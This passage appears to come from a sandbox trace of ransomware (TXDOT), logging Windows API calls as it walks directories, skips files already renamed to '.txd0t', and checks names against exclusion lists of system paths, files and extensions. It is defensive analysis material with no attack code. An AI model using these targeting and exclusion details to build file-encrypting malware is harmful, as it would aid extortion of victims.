ftLastWriteTime.dwLowDateTime=0x580c28ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.568] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.568] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.568] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0128.568] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0128.568] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1030\\!TXDOT_READ_ME!.txt" [0128.568] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.568] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.569] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5809c6a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xef2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.569] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.569] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.569] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0128.569] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0128.569] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1030\\eula.rtf.txd0t" [0128.569] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.569] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.569] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x131b4, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.569] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.569] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.569] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0128.569] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0128.569] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.txd0t" [0128.569] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.569] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.569] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.569] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.569] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.569] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0128.569] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0128.569] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" [0128.569] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.569] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.569] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.570] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.570] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.570] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.570] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.570] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0128.570] GetProcessHeap () returned 0xe30000 [0128.570] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.570] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5815b20e, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1031", cAlternateFileName="")) returned 1 [0128.570] StrCmpW (psz1="1031", psz2=".") returned 1 [0128.570] StrCmpW (psz1="1031", psz2="..") returned 1 [0128.570] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.570] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.570] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1031", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0128.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\system32\\") returned 0x0 [0128.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\system\\") returned 0x0 [0128.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\local\\") returned 0x0 [0128.570] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\boot\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\perflogs\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\programdata\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\drivers\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\wsus\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="crypt_detect") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="cryptolocker") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="ransomware") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\WINDOWS") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.571] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\Program Files") returned 0x0 [0128.572] GetProcessHeap () returned 0xe30000 [0128.572] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.572] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0128.572] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\*") returned="C:\\588bce7c90097ed212\\1031\\*" [0128.572] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5815b20e, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.572] StrCmpW (psz1=".", psz2=".") returned 0 [0128.572] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5815b20e, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.572] StrCmpW (psz1="..", psz2=".") returned 1 [0128.572] StrCmpW (psz1="..", psz2="..") returned 0 [0128.572] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5810ed51, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5810ed51, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5810ed51, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.572] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.572] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.572] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0128.572] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0128.572] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1031\\!TXDOT_READ_ME!.txt" [0128.572] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.572] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.573] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.573] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.573] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.573] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5810ed51, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf5b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.573] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.573] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.573] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0128.573] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0128.573] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1031\\eula.rtf.txd0t" [0128.573] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.573] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.573] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x143aa, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.573] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.573] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.573] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0128.573] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0128.573] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.txd0t" [0128.573] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.573] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.573] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.573] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.573] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.573] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0128.573] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0128.573] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" [0128.573] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.573] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.573] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.573] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.573] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.573] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.573] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.573] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.573] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.573] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.574] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.574] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.574] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.574] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.574] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.574] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.574] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.574] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.574] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.574] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.574] GetProcessHeap () returned 0xe30000 [0128.574] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.574] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x582d8947, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1032", cAlternateFileName="")) returned 1 [0128.574] StrCmpW (psz1="1032", psz2=".") returned 1 [0128.574] StrCmpW (psz1="1032", psz2="..") returned 1 [0128.574] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.574] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.574] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1032", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\system32\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\system\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\local\\") returned 0x0 [0128.574] 